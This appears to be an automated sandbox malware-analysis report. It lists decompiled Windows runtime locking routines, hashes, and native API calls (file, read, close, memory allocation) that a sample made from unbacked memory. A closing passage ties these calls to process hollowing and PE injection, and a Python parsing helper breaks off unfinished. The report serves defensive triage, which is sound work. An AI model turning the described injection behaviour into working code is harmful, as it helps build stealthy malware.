• Instruction ID: 52efd574ec27ec1ea4775b7fe8d353fff2760826ade8cbea930b06a04edf8833
• Opcode Fuzzy Hash: 8e56ee01cb4204ebe65d36f6a96ce0d07335b03f75e75d3483e97f563eb5173d
• Instruction Fuzzy Hash: 2F21AE7290021DEBCB20DFA8CD41AFE73BCAB50700F444556FE46E3141DB70AA588BE1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 45%
                                                              			E00AD53A5(signed int _a4, char _a8) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t32;
                                                              				signed int _t37;
                                                              				signed int _t40;
                                                              				signed int _t42;
                                                              				void* _t45;
                                                              				intOrPtr _t46;
                                                              				void* _t48;
                                                              				signed int _t49;
                                                              				void* _t51;
                                                              				signed int _t57;
                                                              				signed int _t64;
                                                              				signed int _t71;
                                                              				void* _t74;
                                                              				intOrPtr _t78;
                                                              				signed int* _t79;
                                                              				void* _t85;
                                                              				signed int _t86;
                                                              				signed int _t92;
                                                              				void* _t104;
                                                              				void* _t105;
                                                              
                                                              				_t64 = _a4;
                                                              				_t32 =  *(_t64 + 0x28);
                                                              				_t71 = _t64 + 0x28;
                                                              				_push(_t92);
                                                              				if(_t32 < 0) {
                                                              					_t78 =  *[fs:0x18];
                                                              					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                              					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                              						goto L3;
                                                              					} else {
                                                              						__eflags = _t32 | 0xffffffff;
                                                              						asm("lock xadd [ecx], eax");
                                                              						return 1;
                                                              					}
                                                              				} else {
                                                              					L3:
                                                              					_push(_t86);
                                                              					while(1) {
                                                              						L4:
                                                              						__eflags = _t32;
                                                              						if(_t32 == 0) {
                                                              							break;
                                                              						}
                                                              						__eflags = _a8;
                                                              						if(_a8 == 0) {
                                                              							__eflags = 0;
                                                              							return 0;
                                                              						} else {
                                                              							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                              							_t79 = _t64 + 0x24;
                                                              							_t71 = 1;
                                                              							asm("lock xadd [eax], ecx");
                                                              							_t32 =  *(_t64 + 0x28);
                                                              							_a4 = _t32;
                                                              							__eflags = _t32;
                                                              							if(_t32 != 0) {
                                                              								L19:
                                                              								_t86 = 0;
                                                              								__eflags = 0;
                                                              								while(1) {
                                                              									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                              									asm("sbb esi, esi");
                                                              									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00b901c0;
                                                              									_push(_t92);
                                                              									_push(0);
                                                              									_t37 = E00AAF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                              									__eflags = _t37 - 0x102;
                                                              									if(_t37 != 0x102) {
                                                              										break;
                                                              									}
                                                              									_t71 =  *(_t92 + 4);
                                                              									_t85 =  *_t92;
                                                              									_t51 = E00AF4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                              									_push(_t85);
                                                              									_push(_t51);
                                                              									E00B03F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                              									E00B03F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                              									_t86 = _t86 + 1;
                                                              									_t105 = _t104 + 0x28;
                                                              									__eflags = _t86 - 2;
                                                              									if(__eflags > 0) {
                                                              										E00B3217A(_t71, __eflags, _t64);
                                                              									}
                                                              									_push("RTL: Re-Waiting\n");
                                                              									_push(0);
                                                              									_push(0x65);
                                                              									E00B03F92();
                                                              									_t104 = _t105 + 0xc;
                                                              								}
                                                              								__eflags = _t37;
                                                              								if(__eflags < 0) {
                                                              									_push(_t37);
                                                              									E00AF3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                              									asm("int3");
                                                              									_t40 =  *_t71;
                                                              									 *_t71 = 0;
                                                              									__eflags = _t40;
                                                              									if(_t40 == 0) {
                                                              										L1:
                                                              										_t42 = E00AD5384(_t92 + 0x24);
                                                              										if(_t42 != 0) {
                                                              											goto L31;
                                                              										} else {
                                                              											goto L2;
                                                              										}
                                                              									} else {
                                                              										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                              										_push( &_a4);
                                                              										_push(_t40);
                                                              										_t49 = E00AAF970( *((intOrPtr*)(_t92 + 0x18)));
                                                              										__eflags = _t49;
                                                              										if(__eflags >= 0) {
                                                              											goto L1;
                                                              										} else {
                                                              											_push(_t49);
                                                              											E00AF3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                              											L31:
                                                              											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                              											_push( &_a4);
                                                              											_push(1);
                                                              											_t42 = E00AAF970( *((intOrPtr*)(_t92 + 0x20)));
                                                              											__eflags = _t42;
                                                              											if(__eflags >= 0) {
                                                              												L2:
                                                              												return _t42;
                                                              											} else {
                                                              												_push(_t42);
                                                              												E00AF3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                              												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                              												_push( &_a4);
                                                              												_push(1);
                                                              												_t42 = E00AAF970( *((intOrPtr*)(_t92 + 0x20)));
                                                              												__eflags = _t42;
                                                              												if(__eflags >= 0) {
                                                              													goto L2;
                                                              												} else {
                                                              													_push(_t42);
                                                              													_t45 = E00AF3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                              													asm("int3");
                                                              													while(1) {
                                                              														_t74 = _t45;
                                                              														__eflags = _t45 - 1;
                                                              														if(_t45 != 1) {
                                                              															break;
                                                              														}
                                                              														_t86 = _t86 | 0xffffffff;
                                                              														_t45 = _t74;
                                                              														asm("lock cmpxchg [ebx], edi");
                                                              														__eflags = _t45 - _t74;
                                                              														if(_t45 != _t74) {
                                                              															continue;
                                                              														} else {
                                                              															_t46 =  *[fs:0x18];
                                                              															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                              															return _t46;
                                                              														}
                                                              														goto L38;
                                                              													}
                                                              													E00AD5329(_t74, _t92);
                                                              													_push(1);
                                                              													_t48 = E00AD53A5(_t92);
                                                              													return _t48;
                                                              												}
                                                              											}
                                                              										}
                                                              									}
                                                              								} else {
                                                              									_t32 =  *(_t64 + 0x28);
                                                              									continue;
                                                              								}
                                                              							} else {
                                                              								_t71 =  *_t79;
                                                              								__eflags = _t71;
                                                              								if(__eflags > 0) {
                                                              									while(1) {
                                                              										_t57 = _t71;
                                                              										asm("lock cmpxchg [edi], esi");
                                                              										__eflags = _t57 - _t71;
                                                              										if(_t57 == _t71) {
                                                              											break;
                                                              										}
                                                              										_t71 = _t57;
                                                              										__eflags = _t57;
                                                              										if(_t57 > 0) {
                                                              											continue;
                                                              										}
                                                              										break;
                                                              									}
                                                              									_t32 = _a4;
                                                              									__eflags = _t71;
                                                              								}
                                                              								if(__eflags != 0) {
                                                              									continue;
                                                              								} else {
                                                              									goto L19;
                                                              								}
                                                              							}
                                                              						}
                                                              						goto L38;
                                                              					}
                                                              					_t71 = _t71 | 0xffffffff;
                                                              					_t32 = 0;
                                                              					asm("lock cmpxchg [edx], ecx");
                                                              					__eflags = 0;
                                                              					if(0 != 0) {
                                                              						goto L4;
                                                              					} else {
                                                              						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                              						return 1;
                                                              					}
                                                              				}
                                                              				L38:
                                                              			}

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B122F4
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 00B1230B
                                                              • RTL: Re-Waiting, xrefs: 00B12328
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00B122FC
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-871070163
                                                              • Opcode ID: 1f1eb6abae2b42ed6f36e3ad08dc7165740d6bab56c4366a45126e5b7fbe142f
                                                              • Instruction ID: 0c088ed71baa2315096a69d48370f828c8732b4ddcd5c577002bc8e57c1d20db
                                                              • Opcode Fuzzy Hash: 1f1eb6abae2b42ed6f36e3ad08dc7165740d6bab56c4366a45126e5b7fbe142f
                                                              • Instruction Fuzzy Hash: 2D512671A006056BDF159B78CC91FE673E8EF58360F10466AFD19DB282EA71ED8187A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 51%
                                                              			E00ADEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                              				intOrPtr _v8;
                                                              				intOrPtr _v12;
                                                              				signed int _v24;
                                                              				intOrPtr* _v28;
                                                              				intOrPtr _v32;
                                                              				signed int _v36;
                                                              				intOrPtr _v40;
                                                              				short _v66;
                                                              				char _v72;
                                                              				void* __esi;
                                                              				intOrPtr _t38;
                                                              				intOrPtr _t39;
                                                              				signed int _t40;
                                                              				intOrPtr _t42;
                                                              				intOrPtr _t43;
                                                              				signed int _t44;
                                                              				void* _t46;
                                                              				intOrPtr _t48;
                                                              				signed int _t49;
                                                              				intOrPtr _t50;
                                                              				intOrPtr _t53;
                                                              				signed char _t67;
                                                              				void* _t72;
                                                              				intOrPtr _t77;
                                                              				intOrPtr* _t80;
                                                              				intOrPtr _t84;
                                                              				intOrPtr* _t85;
                                                              				void* _t91;
                                                              				void* _t92;
                                                              				void* _t93;
                                                              
                                                              				_t80 = __edi;
                                                              				_t75 = __edx;
                                                              				_t70 = __ecx;
                                                              				_t84 = _a4;
                                                              				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                              					E00ACDA92(__ecx, __edx, __eflags, _t84);
                                                              					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                              				}
                                                              				_push(0);
                                                              				__eflags = _t38 - 0xffffffff;
                                                              				if(_t38 == 0xffffffff) {
                                                              					_t39 =  *0xb9793c; // 0x0
                                                              					_push(0);
                                                              					_push(_t84);
                                                              					_t40 = E00AB16C0(_t39);
                                                              				} else {
                                                              					_t40 = E00AAF9D4(_t38);
                                                              				}
                                                              				_pop(_t85);
                                                              				__eflags = _t40;
                                                              				if(__eflags < 0) {
                                                              					_push(_t40);
                                                              					E00AF3915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                              					asm("int3");
                                                              					while(1) {
                                                              						L21:
                                                              						_t76 =  *[fs:0x18];
                                                              						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                              						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                              						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                              							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                              							_v66 = 0x1722;
                                                              							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                              							_t76 =  &_v72;
                                                              							_push( &_v72);
                                                              							_v28 = _t85;
                                                              							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                              							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                              							_push(0x10);
                                                              							_push(0x20402);
                                                              							E00AB01A4( *0x7ffe0382 & 0x000000ff);
                                                              						}
                                                              						while(1) {
                                                              							_t43 = _v8;
                                                              							_push(_t80);
                                                              							_push(0);
                                                              							__eflags = _t43 - 0xffffffff;
                                                              							if(_t43 == 0xffffffff) {
                                                              								_t71 =  *0xb9793c; // 0x0
                                                              								_push(_t85);
                                                              								_t44 = E00AB1F28(_t71);
                                                              							} else {
                                                              								_t44 = E00AAF8CC(_t43);
                                                              							}
                                                              							__eflags = _t44 - 0x102;
                                                              							if(_t44 != 0x102) {
                                                              								__eflags = _t44;
                                                              								if(__eflags < 0) {
                                                              									_push(_t44);
                                                              									E00AF3915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                              									asm("int3");
                                                              									E00B32306(_t85);
                                                              									__eflags = _t67 & 0x00000002;
                                                              									if((_t67 & 0x00000002) != 0) {
                                                              										_t7 = _t67 + 2; // 0x4
                                                              										_t72 = _t7;
                                                              										asm("lock cmpxchg [edi], ecx");
                                                              										__eflags = _t67 - _t67;
                                                              										if(_t67 == _t67) {
                                                              											E00ADEC56(_t72, _t76, _t80, _t85);
                                                              										}
                                                              									}
                                                              									return 0;
                                                              								} else {
                                                              									__eflags = _v24;
                                                              									if(_v24 != 0) {
                                                              										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                              									}
                                                              									return 2;
                                                              								}
                                                              								goto L36;
                                                              							}
                                                              							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                              							_push(_t67);
                                                              							_t46 = E00AF4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                              							_push(_t77);
                                                              							E00B03F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                              							_t48 =  *_t85;
                                                              							_t92 = _t91 + 0x18;
                                                              							__eflags = _t48 - 0xffffffff;
                                                              							if(_t48 == 0xffffffff) {
                                                              								_t49 = 0;
                                                              								__eflags = 0;
                                                              							} else {
                                                              								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                              							}
                                                              							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                              							_push(_t49);
                                                              							_t50 = _v12;
                                                              							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                              							_push(_t85);
                                                              							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                              							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                              							E00B03F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                              							_t53 =  *_t85;
                                                              							_t93 = _t92 + 0x20;
                                                              							_t67 = _t67 + 1;
                                                              							__eflags = _t53 - 0xffffffff;
                                                              							if(_t53 != 0xffffffff) {
                                                              								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                              								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                              							}
                                                              							__eflags = _t67 - 2;
                                                              							if(_t67 > 2) {
                                                              								__eflags = _t85 - 0xb920c0;
                                                              								if(_t85 != 0xb920c0) {
                                                              									_t76 = _a4;
                                                              									__eflags = _a4 - _a8;
                                                              									if(__eflags == 0) {
                                                              										E00B3217A(_t71, __eflags, _t85);
                                                              									}
                                                              								}
                                                              							}
                                                              							_push("RTL: Re-Waiting\n");
                                                              							_push(0);
                                                              							_push(0x65);
                                                              							_a8 = _a4;
                                                              							E00B03F92();
                                                              							_t91 = _t93 + 0xc;
                                                              							__eflags =  *0x7ffe0382;
                                                              							if( *0x7ffe0382 != 0) {
                                                              								goto L21;
                                                              							}
                                                              						}
                                                              						goto L36;
                                                              					}
                                                              				} else {
                                                              					return _t40;
                                                              				}
                                                              				L36:
                                                              			}

                                                              Address column printed beside the pseudo-code listing above, in listing order (extraction detached it from the statements; 0x00000000 marks entries with no resolved address):
                                                              0x00adec56, 0x00adec56, 0x00adec56, 0x00adec5c, 0x00adec64, 0x00b123e6, 0x00b123eb, 0x00b123eb, 0x00adec6a, 0x00adec6c,
                                                              0x00adec6f, 0x00b123f3, 0x00b123f8, 0x00b123fa, 0x00b123fc, 0x00adec75, 0x00adec76, 0x00adec76, 0x00adec7b, 0x00adec7c,
                                                              0x00adec7e, 0x00b12406, 0x00b12407, 0x00b1240c, 0x00b1240d, 0x00b1240d, 0x00b1240d, 0x00b12414, 0x00b12417, 0x00b1241e,
                                                              0x00b12435, 0x00b12438, 0x00b1243c, 0x00b1243f, 0x00b12442, 0x00b12443, 0x00b12446, 0x00b12449, 0x00b12453, 0x00b12455,
                                                              0x00b1245b, 0x00b1245b, 0x00adeb99, 0x00adeb99, 0x00adeb9c, 0x00adeb9d, 0x00adeb9f, 0x00adeba2, 0x00b12465, 0x00b1246b,
                                                              0x00b1246d, 0x00adeba8, 0x00adeba9, 0x00adeba9, 0x00adebae, 0x00adebb3, 0x00adebb9, 0x00adebbb, 0x00b12513, 0x00b12514,
                                                              0x00b12519, 0x00b1251b, 0x00adec2a, 0x00adec2d, 0x00adec33, 0x00adec36, 0x00adec3a, 0x00adec3e, 0x00adec40, 0x00adec47,
                                                              0x00adec47, 0x00adec40, 0x00ab22c6, 0x00adebc1, 0x00adebc1, 0x00adebc5, 0x00adec9a, 0x00adec9a, 0x00adebd6, 0x00adebd6,
                                                              0x00000000, 0x00adebbb, 0x00b12477, 0x00b1247c, 0x00b12486, 0x00b1248b, 0x00b12496, 0x00b1249b, 0x00b1249d, 0x00b124a0,
                                                              0x00b124a3, 0x00b124aa, 0x00b124aa, 0x00b124a5, 0x00b124a5, 0x00b124a5, 0x00b124ac, 0x00b124af, 0x00b124b0, 0x00b124b3,
                                                              0x00b124b9, 0x00b124ba, 0x00b124bb, 0x00b124c6, 0x00b124cb, 0x00b124cd, 0x00b124d0, 0x00b124d1, 0x00b124d4, 0x00b124d6,
                                                              0x00b124d9, 0x00b124d9, 0x00b124dc, 0x00b124df, 0x00b124e1, 0x00b124e7, 0x00b124e9, 0x00b124ec, 0x00b124ef, 0x00b124f2,
                                                              0x00b124f2, 0x00b124ef, 0x00b124e7, 0x00b124fa, 0x00b124ff, 0x00b12501, 0x00b12503, 0x00b12506, 0x00b1250b, 0x00adeb8c,
                                                              0x00adeb93, 0x00000000, 0x00000000, 0x00adeb93, 0x00000000, 0x00adeb99, 0x00adec85, 0x00adec85, 0x00adec85, 0x00000000

                                                              Strings
                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00B1248D
                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00B124BD
                                                              • RTL: Re-Waiting, xrefs: 00B124FA
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                              • API String ID: 0-3177188983
                                                              • Opcode ID: 88bf27d674288fc6d74e99178840004eae67b8f53cef65298c9b5f453d1fb3d2
                                                              • Instruction ID: d148e507b3be665c11ca448b72945eca827756dc7ee8b692b5fbd9704d7fddb2
                                                              • Opcode Fuzzy Hash: 88bf27d674288fc6d74e99178840004eae67b8f53cef65298c9b5f453d1fb3d2
                                                              • Instruction Fuzzy Hash: A841F670A00204BFDB24EB68DD95FAA77F8EF44720F208656F6559B3C2D734E95187A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID:
                                                              • API String ID: 3965848254-0
                                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction ID: 777fd42ee5b0811ec947c9681e66b65ffbe8e4bed0dc1b14147b083cc4ed0691
                                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction Fuzzy Hash: 6A917171D0028AEFDF28DF9AC8456EEBBB4FF55304F64847AD811A7152E7309A81CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,000A3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000A3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000A861D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID: .z`
                                                              • API String ID: 823142352-1441809116
                                                              • Opcode ID: 3bc0459ea3f62a27a632d6c68c242fceca15017a8104a3b30895f9d12cc57ff2
                                                              • Instruction ID: 044858088615c11ce25331d4fffce68150ba9ae7e48648f7b2df4ac7709305fa
                                                              • Opcode Fuzzy Hash: 3bc0459ea3f62a27a632d6c68c242fceca15017a8104a3b30895f9d12cc57ff2
                                                              • Instruction Fuzzy Hash: 6C01B6B2200109AFCB18CF98DC94EEB37A9AF8C354F158248FA5D97281C630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,000A3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000A3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000A861D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID: .z`
                                                              • API String ID: 823142352-1441809116
                                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                              • Instruction ID: a054268856882b70fab69d85b20c3d5365375402527355f796a9fef163e3e6cb
                                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                              • Instruction Fuzzy Hash: 16F0BDB2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 000A86C5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: !:
                                                              • API String ID: 2738559852-62046882
                                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                              • Instruction ID: 2803bc07e74742361866f44648ad650fa1d327d65464394a32f34539d7fb28d0
                                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                              • Instruction Fuzzy Hash: 6BF0B7B2200208AFCB18DF89DC85EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtClose.NTDLL(@=,?,?,000A3D40,00000000,FFFFFFFF), ref: 000A8725
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID: @=
                                                              • API String ID: 3535843008-99022194
                                                              • Opcode ID: b5de6bd0b387108e1cfe60257033f6daa565221c5c03852b779f3b9339cf4272
                                                              • Instruction ID: aeffd207ecee021495a2d54419d23bd33d3c1b51f4976fc498789483937fa79d
                                                              • Opcode Fuzzy Hash: b5de6bd0b387108e1cfe60257033f6daa565221c5c03852b779f3b9339cf4272
                                                              • Instruction Fuzzy Hash: 23E08C722002146BD710EF94CC49ED77B69EB44660F054558BA1D9B243C530E600C6E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtClose.NTDLL(@=,?,?,000A3D40,00000000,FFFFFFFF), ref: 000A8725
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID: @=
                                                              • API String ID: 3535843008-99022194
                                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                              • Instruction ID: 364e1efd0a4ee39bf7aea47cedc203dd5b7e0f48e541e2a6c928a1eb425ed541
                                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                              • Instruction Fuzzy Hash: 2BD01776200218ABD714EBD8CC89EE77BACEF48760F154499BA189B242C570FA0086E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00092D11,00002000,00003000,00000004), ref: 000A87E9
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 18948f2e3fd426bdfe1ac8506122349960e1cfb6fadfb435100b931aa07dcfc1
                                                              • Instruction ID: fa3e9126cfc46b8ea9c9021c8fe92055fa3ccf12e7aa02bdf1704aa18305253b
                                                              • Opcode Fuzzy Hash: 18948f2e3fd426bdfe1ac8506122349960e1cfb6fadfb435100b931aa07dcfc1
                                                              • Instruction Fuzzy Hash: DFF058B2210208AFDB18DF88CC81EEB77ACAF88200F108149FE0997242C630E910CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00092D11,00002000,00003000,00000004), ref: 000A87E9
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                              • Instruction ID: 6d337c939bd5961a09b5526a2660e96ba7f608cc02b0948288b7ff14b09fdbfa
                                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                              • Instruction Fuzzy Hash: E5F015B2200208ABCB18DF89CC81EEB77ADAF88750F118148BE0897241C630F810CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%
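The Nt* blocks above (NtCreateFile, NtReadFile, NtClose, NtAllocateVirtualMemory) all resolve to the same memory dump, 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, whose source line is marked "based on PE: false": the sandbox found these native calls in a region of process 7 that it could not map back to any loaded image. That is the memory picture behind the process hollowing and PE injection signatures in the Overview, and it is the first thing to pull out of a report like this when deciding which dump to disassemble. The helper below is an added example written for this page; it is not part of the Joe Sandbox report or of Joe Sandbox's own tooling. It reads the "APIs" and "Memory Dump Source" lines exactly as they are printed above (the sample text is copied from those blocks), groups each function's native calls by the dump they were resolved in, and lists the calls whose call site lies in unbacked memory. The field layout it assumes for the .sdmp name (process index, phase, record id, base address, then two fields this page does not explain and which are kept raw) is inferred from the names on this page and is an assumption, not documented Joe Sandbox behaviour.

```python
"""Triage helper for the per-function "APIs" / "Memory Dump Source" blocks of a
Joe Sandbox report. Added example for this page, not part of the report or of
Joe Sandbox itself."""
import re

# Constructed sample: the four Nt* function blocks and one PE-backed block
# from this page, trimmed to the lines the parser reads.
SAMPLE_REPORT = """
APIs
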